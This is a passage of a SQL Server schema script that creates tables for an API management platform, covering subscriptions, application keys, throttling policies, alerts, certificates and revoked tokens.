PRIMARY KEY (SUBSCRIPTION_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SUBSCRIPTION_KEY_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_SUBSCRIPTION_KEY_MAPPING (
SUBSCRIPTION_ID INTEGER,
ACCESS_TOKEN VARCHAR(512),
KEY_TYPE VARCHAR(512) NOT NULL,
FOREIGN KEY(SUBSCRIPTION_ID) REFERENCES AM_SUBSCRIPTION(SUBSCRIPTION_ID) ON UPDATE CASCADE,
PRIMARY KEY(SUBSCRIPTION_ID,ACCESS_TOKEN)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION_KEY_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION_KEY_MAPPING (
UUID VARCHAR(100),
APPLICATION_ID INTEGER,
CONSUMER_KEY VARCHAR(512),
KEY_TYPE VARCHAR(512) NOT NULL,
STATE VARCHAR(30) NOT NULL,
CREATE_MODE VARCHAR(30) DEFAULT 'CREATED',
KEY_MANAGER VARCHAR(100),
APP_INFO VARBINARY(MAX) DEFAULT NULL,
FOREIGN KEY(APPLICATION_ID) REFERENCES AM_APPLICATION(APPLICATION_ID) ON UPDATE CASCADE,
PRIMARY KEY(APPLICATION_ID,KEY_TYPE,KEY_MANAGER)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION_REGISTRATION]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION_REGISTRATION (
REG_ID INTEGER IDENTITY(1,1),
SUBSCRIBER_ID INTEGER,
WF_REF VARCHAR(255) NOT NULL,
APP_ID INTEGER,
TOKEN_TYPE VARCHAR(30),
TOKEN_SCOPE VARCHAR(1500) DEFAULT 'default',
INPUTS VARCHAR(1000),
ALLOWED_DOMAINS VARCHAR(256),
VALIDITY_PERIOD BIGINT,
KEY_MANAGER VARCHAR(255) NOT NULL,
UNIQUE (SUBSCRIBER_ID,APP_ID,TOKEN_TYPE,KEY_MANAGER),
FOREIGN KEY(SUBSCRIBER_ID) REFERENCES AM_SUBSCRIBER(SUBSCRIBER_ID) ON DELETE NO ACTION,
FOREIGN KEY(APP_ID) REFERENCES AM_APPLICATION(APPLICATION_ID) ON UPDATE CASCADE ON DELETE NO ACTION,
PRIMARY KEY (REG_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_LC_EVENT]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_LC_EVENT (
EVENT_ID INTEGER IDENTITY(1,1),
API_ID INTEGER NOT NULL,
PREVIOUS_STATE VARCHAR(50),
NEW_STATE VARCHAR(50) NOT NULL,
USER_ID VARCHAR(50) NOT NULL,
TENANT_ID INTEGER NOT NULL,
EVENT_DATE DATETIME NOT NULL,
FOREIGN KEY(API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE,
PRIMARY KEY (EVENT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APP_KEY_DOMAIN_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_APP_KEY_DOMAIN_MAPPING (
CONSUMER_KEY VARCHAR(512),
AUTHZ_DOMAIN VARCHAR(255) DEFAULT 'ALL',
PRIMARY KEY (CONSUMER_KEY,AUTHZ_DOMAIN)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_COMMENTS]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_COMMENTS (
COMMENT_ID VARCHAR(255) NOT NULL,
COMMENT_TEXT VARCHAR(512),
CREATED_BY VARCHAR(255),
CREATED_TIME DATETIME NOT NULL,
UPDATED_TIME DATETIME DEFAULT NULL,
API_ID INTEGER,
PARENT_COMMENT_ID VARCHAR(255) DEFAULT NULL,
ENTRY_POINT VARCHAR(20),
CATEGORY VARCHAR(20) DEFAULT 'general',
FOREIGN KEY(API_ID) REFERENCES AM_API(API_ID) ON DELETE CASCADE,
FOREIGN KEY(PARENT_COMMENT_ID) REFERENCES AM_API_COMMENTS(COMMENT_ID) ON DELETE CASCADE,
PRIMARY KEY (COMMENT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_RATINGS]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_RATINGS (
RATING_ID VARCHAR(255) NOT NULL,
API_ID INTEGER,
RATING INTEGER,
SUBSCRIBER_ID INTEGER,
FOREIGN KEY(API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE,
FOREIGN KEY(SUBSCRIBER_ID) REFERENCES AM_SUBSCRIBER(SUBSCRIBER_ID) ON UPDATE CASCADE,
PRIMARY KEY (RATING_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_TIER_PERMISSIONS]') AND TYPE IN (N'U'))
CREATE TABLE AM_TIER_PERMISSIONS (
TIER_PERMISSIONS_ID INTEGER IDENTITY(1,1),
TIER VARCHAR(50) NOT NULL,
PERMISSIONS_TYPE VARCHAR(50) NOT NULL,
ROLES VARCHAR(512) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY(TIER_PERMISSIONS_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_EXTERNAL_STORES]') AND TYPE IN (N'U'))
CREATE TABLE AM_EXTERNAL_STORES (
APISTORE_ID INTEGER IDENTITY(1,1),
API_ID INTEGER,
STORE_ID VARCHAR(255) NOT NULL,
STORE_DISPLAY_NAME VARCHAR(255) NOT NULL,
STORE_ENDPOINT VARCHAR(255) NOT NULL,
STORE_TYPE VARCHAR(255) NOT NULL,
LAST_UPDATED_TIME DATETIME,
FOREIGN KEY(API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE,
PRIMARY KEY (APISTORE_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_WORKFLOWS]') AND TYPE IN (N'U'))
CREATE TABLE AM_WORKFLOWS(
WF_ID INTEGER IDENTITY(1,1),
WF_REFERENCE VARCHAR(255) NOT NULL,
WF_TYPE VARCHAR(255) NOT NULL,
WF_STATUS VARCHAR(255) NOT NULL,
WF_CREATED_TIME DATETIME DEFAULT GETDATE(),
WF_UPDATED_TIME DATETIME DEFAULT GETDATE(),
WF_STATUS_DESC VARCHAR(1000),
TENANT_ID INTEGER,
TENANT_DOMAIN VARCHAR(255),
WF_EXTERNAL_REFERENCE VARCHAR(255) NOT NULL UNIQUE,
WF_METADATA VARBINARY(MAX) DEFAULT NULL,
WF_PROPERTIES VARBINARY(MAX) DEFAULT NULL,
PRIMARY KEY (WF_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SHARED_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE AM_SHARED_SCOPE (
NAME VARCHAR(255),
UUID VARCHAR (256),
TENANT_ID INTEGER,
PRIMARY KEY (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_DEFAULT_VERSION]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_DEFAULT_VERSION (
DEFAULT_VERSION_ID INTEGER NOT NULL IDENTITY,
API_NAME VARCHAR(256) NOT NULL ,
API_PROVIDER VARCHAR(256) NOT NULL ,
DEFAULT_API_VERSION VARCHAR(30) ,
PUBLISHED_DEFAULT_API_VERSION VARCHAR(30) ,
PRIMARY KEY (DEFAULT_VERSION_ID)
);
CREATE INDEX IDX_SUB_APP_ID ON AM_SUBSCRIPTION (APPLICATION_ID, SUBSCRIPTION_ID);
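-- AM Alert tables --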
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_ALERT_TYPES]') AND TYPE IN (N'U'))
CREATE TABLE AM_ALERT_TYPES (
ALERT_TYPE_ID INTEGER NOT NULL IDENTITY,
ALERT_TYPE_NAME VARCHAR(255) NOT NULL ,
STAKE_HOLDER VARCHAR(10) NOT NULL,
PRIMARY KEY (ALERT_TYPE_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_ALERT_TYPES_VALUES]') AND TYPE IN (N'U'))
CREATE TABLE AM_ALERT_TYPES_VALUES (
ALERT_TYPE_ID INTEGER,
USER_NAME VARCHAR(255) NOT NULL ,
STAKE_HOLDER VARCHAR(100) NOT NULL ,
PRIMARY KEY (ALERT_TYPE_ID,USER_NAME,STAKE_HOLDER),
CONSTRAINT AM_ALERT_TYPES_VALUES_CONST UNIQUE (ALERT_TYPE_ID,USER_NAME,STAKE_HOLDER)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_ALERT_EMAILLIST]') AND TYPE IN (N'U'))
CREATE TABLE AM_ALERT_EMAILLIST (
EMAIL_LIST_ID INTEGER NOT NULL IDENTITY,
USER_NAME VARCHAR(255) NOT NULL ,
STAKE_HOLDER VARCHAR(100) NOT NULL ,
CONSTRAINT AM_ALERT_EMAILLIST_CONST UNIQUE (EMAIL_LIST_ID,USER_NAME,STAKE_HOLDER),
PRIMARY KEY (EMAIL_LIST_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_ALERT_EMAILLIST_DETAILS]') AND TYPE IN (N'U'))
CREATE TABLE AM_ALERT_EMAILLIST_DETAILS (
EMAIL_LIST_ID INTEGER,
EMAIL VARCHAR(255),
PRIMARY KEY (EMAIL_LIST_ID,EMAIL),
CONSTRAINT AM_ALERT_EMAILLIST_DETAILS_CONST UNIQUE (EMAIL_LIST_ID,EMAIL)
);
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('AbnormalResponseTime', 'publisher');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('AbnormalBackendTime', 'publisher');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('AbnormalRequestsPerMin', 'subscriber');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('AbnormalRequestPattern', 'subscriber');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('UnusualIPAccess', 'subscriber');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('FrequentTierLimitHitting', 'subscriber');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('ApiHealthMonitor', 'publisher');
-- AM Throttling tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_POLICY_SUBSCRIPTION]') AND TYPE IN (N'U'))
CREATE TABLE AM_POLICY_SUBSCRIPTION (
POLICY_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(512) NOT NULL,
DISPLAY_NAME VARCHAR(512) NULL DEFAULT NULL,
TENANT_ID INTEGER NOT NULL,
DESCRIPTION VARCHAR(1024) NULL DEFAULT NULL,
QUOTA_TYPE VARCHAR(25) NOT NULL,
QUOTA INTEGER NOT NULL,
QUOTA_UNIT VARCHAR(10) NULL,
UNIT_TIME INTEGER NOT NULL,
TIME_UNIT VARCHAR(25) NOT NULL,
RATE_LIMIT_COUNT INTEGER NULL DEFAULT NULL,
RATE_LIMIT_TIME_UNIT VARCHAR(25) NULL DEFAULT NULL,
IS_DEPLOYED BIT NOT NULL DEFAULT 0,
CUSTOM_ATTRIBUTES VARBINARY(MAX) DEFAULT NULL,
STOP_ON_QUOTA_REACH BIT NOT NULL DEFAULT 0,
BILLING_PLAN VARCHAR(20) NOT NULL,
UUID VARCHAR(256),
MONETIZATION_PLAN VARCHAR(25) NULL DEFAULT NULL,
FIXED_RATE VARCHAR(15) NULL DEFAULT NULL,
BILLING_CYCLE VARCHAR(15) NULL DEFAULT NULL,
PRICE_PER_REQUEST VARCHAR(15) NULL DEFAULT NULL,
CURRENCY VARCHAR(15) NULL DEFAULT NULL,
MAX_COMPLEXITY INTEGER NOT NULL DEFAULT 0,
MAX_DEPTH INTEGER NOT NULL DEFAULT 0,
PRIMARY KEY (POLICY_ID),
UNIQUE (NAME, TENANT_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_POLICY_APPLICATION]') AND TYPE IN (N'U'))
CREATE TABLE AM_POLICY_APPLICATION (
POLICY_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(512) NOT NULL,
DISPLAY_NAME VARCHAR(512) NULL DEFAULT NULL,
TENANT_ID INTEGER NOT NULL,
DESCRIPTION VARCHAR(1024) NULL DEFAULT NULL,
QUOTA_TYPE VARCHAR(25) NOT NULL,
QUOTA INTEGER NOT NULL,
QUOTA_UNIT VARCHAR(10) NULL DEFAULT NULL,
UNIT_TIME INTEGER NOT NULL,
TIME_UNIT VARCHAR(25) NOT NULL,
IS_DEPLOYED BIT NOT NULL DEFAULT 0,
CUSTOM_ATTRIBUTES VARBINARY(MAX) DEFAULT NULL,
UUID VARCHAR(256),
PRIMARY KEY (POLICY_ID),
UNIQUE (NAME, TENANT_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_POLICY_HARD_THROTTLING]') AND TYPE IN (N'U'))
CREATE TABLE AM_POLICY_HARD_THROTTLING (
POLICY_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(512) NOT NULL,
TENANT_ID INTEGER NOT NULL,
DESCRIPTION VARCHAR(1024) NULL DEFAULT NULL,
QUOTA_TYPE VARCHAR(25) NOT NULL,
QUOTA INTEGER NOT NULL,
QUOTA_UNIT VARCHAR(10) NULL DEFAULT NULL,
UNIT_TIME INTEGER NOT NULL,
TIME_UNIT VARCHAR(25) NOT NULL,
IS_DEPLOYED BIT NOT NULL DEFAULT 0,
PRIMARY KEY (POLICY_ID),
UNIQUE (NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_THROTTLE_POLICY]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_THROTTLE_POLICY (
POLICY_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(512) NOT NULL,
DISPLAY_NAME VARCHAR(512) NULL DEFAULT NULL,
TENANT_ID INTEGER NOT NULL,
DESCRIPTION VARCHAR (1024),
DEFAULT_QUOTA_TYPE VARCHAR(25) NOT NULL,
DEFAULT_QUOTA INTEGER NOT NULL,
DEFAULT_QUOTA_UNIT VARCHAR(10) NULL,
DEFAULT_UNIT_TIME INTEGER NOT NULL,
DEFAULT_TIME_UNIT VARCHAR(25) NOT NULL,
APPLICABLE_LEVEL VARCHAR(25) NOT NULL,
IS_DEPLOYED BIT NOT NULL DEFAULT 0,
UUID VARCHAR(256),
PRIMARY KEY (POLICY_ID),
UNIQUE (NAME, TENANT_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_CONDITION_GROUP]') AND TYPE IN (N'U'))
CREATE TABLE AM_CONDITION_GROUP (
CONDITION_GROUP_ID INTEGER IDENTITY(1,1),
POLICY_ID INTEGER NOT NULL,
QUOTA_TYPE VARCHAR(25),
QUOTA INTEGER NOT NULL,
QUOTA_UNIT VARCHAR(10) NULL DEFAULT NULL,
UNIT_TIME INTEGER NOT NULL,
TIME_UNIT VARCHAR(25) NOT NULL,
DESCRIPTION VARCHAR (1024) NULL DEFAULT NULL,
PRIMARY KEY (CONDITION_GROUP_ID),
FOREIGN KEY (POLICY_ID) REFERENCES AM_API_THROTTLE_POLICY(POLICY_ID) ON DELETE CASCADE ON UPDATE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_QUERY_PARAMETER_CONDITION]') AND TYPE IN (N'U'))
CREATE TABLE AM_QUERY_PARAMETER_CONDITION (
QUERY_PARAMETER_ID INTEGER IDENTITY(1,1),
CONDITION_GROUP_ID INTEGER NOT NULL,
PARAMETER_NAME VARCHAR(255) DEFAULT NULL,
PARAMETER_VALUE VARCHAR(255) DEFAULT NULL,
IS_PARAM_MAPPING BIT DEFAULT 1,
PRIMARY KEY (QUERY_PARAMETER_ID),
FOREIGN KEY (CONDITION_GROUP_ID) REFERENCES AM_CONDITION_GROUP(CONDITION_GROUP_ID) ON DELETE CASCADE ON UPDATE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_HEADER_FIELD_CONDITION]') AND TYPE IN (N'U'))
CREATE TABLE AM_HEADER_FIELD_CONDITION (
HEADER_FIELD_ID INTEGER IDENTITY(1,1),
CONDITION_GROUP_ID INTEGER NOT NULL,
HEADER_FIELD_NAME VARCHAR(255) DEFAULT NULL,
HEADER_FIELD_VALUE VARCHAR(255) DEFAULT NULL,
IS_HEADER_FIELD_MAPPING BIT DEFAULT 1,
PRIMARY KEY (HEADER_FIELD_ID),
FOREIGN KEY (CONDITION_GROUP_ID) REFERENCES AM_CONDITION_GROUP(CONDITION_GROUP_ID) ON DELETE CASCADE ON UPDATE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_JWT_CLAIM_CONDITION]') AND TYPE IN (N'U'))
CREATE TABLE AM_JWT_CLAIM_CONDITION (
JWT_CLAIM_ID INTEGER IDENTITY(1,1),
CONDITION_GROUP_ID INTEGER NOT NULL,
CLAIM_URI VARCHAR(512) DEFAULT NULL,
CLAIM_ATTRIB VARCHAR(1024) DEFAULT NULL,
IS_CLAIM_MAPPING BIT DEFAULT 1,
PRIMARY KEY (JWT_CLAIM_ID),
FOREIGN KEY (CONDITION_GROUP_ID) REFERENCES AM_CONDITION_GROUP(CONDITION_GROUP_ID) ON DELETE CASCADE ON UPDATE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_IP_CONDITION]') AND TYPE IN (N'U'))
CREATE TABLE AM_IP_CONDITION (
AM_IP_CONDITION_ID INTEGER IDENTITY(1,1),
STARTING_IP VARCHAR(45) NULL,
ENDING_IP VARCHAR(45) NULL,
SPECIFIC_IP VARCHAR(45) NULL,
WITHIN_IP_RANGE BIT DEFAULT 1,
CONDITION_GROUP_ID INT NULL,
PRIMARY KEY (AM_IP_CONDITION_ID),
FOREIGN KEY (CONDITION_GROUP_ID)
REFERENCES AM_CONDITION_GROUP (CONDITION_GROUP_ID) ON DELETE CASCADE ON UPDATE CASCADE);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_POLICY_GLOBAL]') AND TYPE IN (N'U'))
CREATE TABLE AM_POLICY_GLOBAL (
POLICY_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(512) NOT NULL,
KEY_TEMPLATE VARCHAR(512) NOT NULL,
TENANT_ID INTEGER NOT NULL,
DESCRIPTION VARCHAR(1024) NULL DEFAULT NULL,
SIDDHI_QUERY VARBINARY(MAX) DEFAULT NULL,
IS_DEPLOYED BIT NOT NULL DEFAULT 0,
UUID VARCHAR(256),
PRIMARY KEY (POLICY_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_THROTTLE_TIER_PERMISSIONS]') AND TYPE IN (N'U'))
CREATE TABLE AM_THROTTLE_TIER_PERMISSIONS (
THROTTLE_TIER_PERMISSIONS_ID INTEGER IDENTITY(1,1),
TIER VARCHAR(50) NULL,
PERMISSIONS_TYPE VARCHAR(50) NULL,
ROLES VARCHAR(512) NULL,
TENANT_ID INTEGER NULL,
PRIMARY KEY (THROTTLE_TIER_PERMISSIONS_ID));
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_BLOCK_CONDITIONS]') AND TYPE IN (N'U'))
CREATE TABLE AM_BLOCK_CONDITIONS (
CONDITION_ID INTEGER IDENTITY(1,1),
TYPE varchar(45) DEFAULT NULL,
VALUE varchar(512) DEFAULT NULL,
ENABLED varchar(45) DEFAULT NULL,
DOMAIN varchar(45) DEFAULT NULL,
UUID VARCHAR(256),
PRIMARY KEY (CONDITION_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_CERTIFICATE_METADATA]') AND TYPE IN (N'U'))
CREATE TABLE AM_CERTIFICATE_METADATA (
TENANT_ID INTEGER NOT NULL,
ALIAS VARCHAR(255) NOT NULL,
END_POINT VARCHAR(255) NOT NULL,
CERTIFICATE VARBINARY(MAX) DEFAULT NULL,
CONSTRAINT PK_ALIAS PRIMARY KEY (ALIAS)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_CLIENT_CERTIFICATE]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_CLIENT_CERTIFICATE (
TENANT_ID INTEGER NOT NULL,
ALIAS VARCHAR(45) NOT NULL,
API_ID INTEGER NOT NULL,
CERTIFICATE VARBINARY(MAX) NOT NULL,
REMOVED BIT NOT NULL DEFAULT 0,
TIER_NAME VARCHAR(512),
REVISION_UUID VARCHAR(255) NOT NULL DEFAULT 'Current API',
PRIMARY KEY (ALIAS, TENANT_ID, REMOVED, REVISION_UUID),
FOREIGN KEY (API_ID) REFERENCES AM_API(API_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION_GROUP_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION_GROUP_MAPPING (
APPLICATION_ID INTEGER NOT NULL,
GROUP_ID VARCHAR(512),
TENANT VARCHAR(255),
PRIMARY KEY (APPLICATION_ID,GROUP_ID,TENANT),
FOREIGN KEY (APPLICATION_ID) REFERENCES AM_APPLICATION(APPLICATION_ID) ON DELETE CASCADE ON UPDATE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_USAGE_UPLOADED_FILES]') AND TYPE IN (N'U'))
CREATE TABLE AM_USAGE_UPLOADED_FILES (
TENANT_DOMAIN VARCHAR(255) NOT NULL,
FILE_NAME VARCHAR(255) NOT NULL,
FILE_TIMESTAMP DATETIME DEFAULT GETDATE(),
FILE_PROCESSED INTEGER DEFAULT 0,
FILE_CONTENT VARBINARY(MAX) DEFAULT NULL,
PRIMARY KEY (TENANT_DOMAIN, FILE_NAME, FILE_TIMESTAMP)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_LC_PUBLISH_EVENTS]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_LC_PUBLISH_EVENTS (
ID INTEGER NOT NULL IDENTITY,
TENANT_DOMAIN VARCHAR(255) NOT NULL,
API_ID VARCHAR(500) NOT NULL,
EVENT_TIME DATETIME DEFAULT GETDATE(),
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION_ATTRIBUTES]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION_ATTRIBUTES (
APPLICATION_ID INTEGER NOT NULL,
NAME VARCHAR(255) NOT NULL,
VALUE VARCHAR(1024) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (APPLICATION_ID,NAME),
FOREIGN KEY (APPLICATION_ID) REFERENCES AM_APPLICATION (APPLICATION_ID) ON DELETE CASCADE ON UPDATE CASCADE
) ;
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_LABELS]') AND TYPE IN (N'U'))
CREATE TABLE AM_LABELS (
LABEL_ID VARCHAR(50),
NAME VARCHAR(255),
DESCRIPTION VARCHAR(1024),
TENANT_DOMAIN VARCHAR(255),
UNIQUE (NAME,TENANT_DOMAIN),
PRIMARY KEY (LABEL_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_LABEL_URLS]') AND TYPE IN (N'U'))
CREATE TABLE AM_LABEL_URLS (
LABEL_ID VARCHAR(50),
ACCESS_URL VARCHAR(255),
PRIMARY KEY (LABEL_ID,ACCESS_URL),
FOREIGN KEY (LABEL_ID) REFERENCES AM_LABELS(LABEL_ID) ON UPDATE CASCADE ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'AM_SYSTEM_APPS') AND TYPE IN (N'U'))
CREATE TABLE AM_SYSTEM_APPS (
ID INTEGER IDENTITY,
NAME VARCHAR(50) NOT NULL,
CONSUMER_KEY VARCHAR(512) NOT NULL,
CONSUMER_SECRET VARCHAR(512) NOT NULL,
TENANT_DOMAIN VARCHAR(255) DEFAULT 'carbon.super',
CREATED_TIME DATETIME2(6) DEFAULT CURRENT_TIMESTAMP,
UNIQUE (CONSUMER_KEY),
PRIMARY KEY (ID)
);
-- BotDATA Email table--
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_NOTIFICATION_SUBSCRIBER]') AND TYPE IN (N'U'))
CREATE TABLE AM_NOTIFICATION_SUBSCRIBER (
UUID VARCHAR(255),
CATEGORY VARCHAR(255),
NOTIFICATION_METHOD VARCHAR(255),
SUBSCRIBER_ADDRESS VARCHAR(255) NOT NULL,
PRIMARY KEY(UUID, SUBSCRIBER_ADDRESS)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_REVOKED_JWT]') AND TYPE IN (N'U'))
CREATE TABLE AM_REVOKED_JWT (
UUID VARCHAR(255) NOT NULL,
SIGNATURE VARCHAR(2048) NOT NULL,
EXPIRY_TIMESTAMP BIGINT NOT NULL,
TENANT_ID INTEGER DEFAULT -1,
TOKEN_TYPE VARCHAR(15) DEFAULT 'DEFAULT',
TIME_CREATED DATETIME DEFAULT GETDATE(),
PRIMARY KEY (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_CATEGORIES]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_CATEGORIES (
UUID VARCHAR(50),
NAME VARCHAR(255),
DESCRIPTION VARCHAR(1024),
TENANT_ID INTEGER DEFAULT -1,
UNIQUE (NAME,TENANT_ID),
PRIMARY KEY (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_USER]') AND TYPE IN (N'U'))
CREATE TABLE AM_USER (
USER_ID VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(255) NOT NULL,
PRIMARY KEY(USER_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_KEY_MANAGER]') AND TYPE IN (N'U'))
CREATE TABLE AM_KEY_MANAGER (
UUID VARCHAR(50) NOT NULL,
NAME VARCHAR(100) NULL,
DISPLAY_NAME VARCHAR(100) NULL,
DESCRIPTION VARCHAR(256) NULL,
TYPE VARCHAR(45) NULL,
CONFIGURATION VARBINARY(MAX) NULL,
ENABLED BIT DEFAULT 1,
TENANT_DOMAIN VARCHAR(100) NULL,
PRIMARY KEY (UUID),
UNIQUE (NAME,TENANT_DOMAIN)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GW_PUBLISHED_API_DETAILS]') AND TYPE IN (N'U'))
CREATE TABLE AM_GW_PUBLISHED_API_DETAILS (
API_ID varchar(255) NOT NULL,
TENANT_DOMAIN varchar(255),
API_PROVIDER varchar(255),
API_NAME varchar(255),
API_VERSION varchar(255),
API_TYPE varchar(50),
PRIMARY KEY (API_ID)
);
-- AM_GW_PUBLISHED_API_DETAILS & AM_GW_API_ARTIFACTS are independent tables for Artifact synchronizer feature which --
-- should not have any referential integrity constraints with other tables in AM database--
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GW_API_ARTIFACTS]') AND TYPE IN (N'U'))
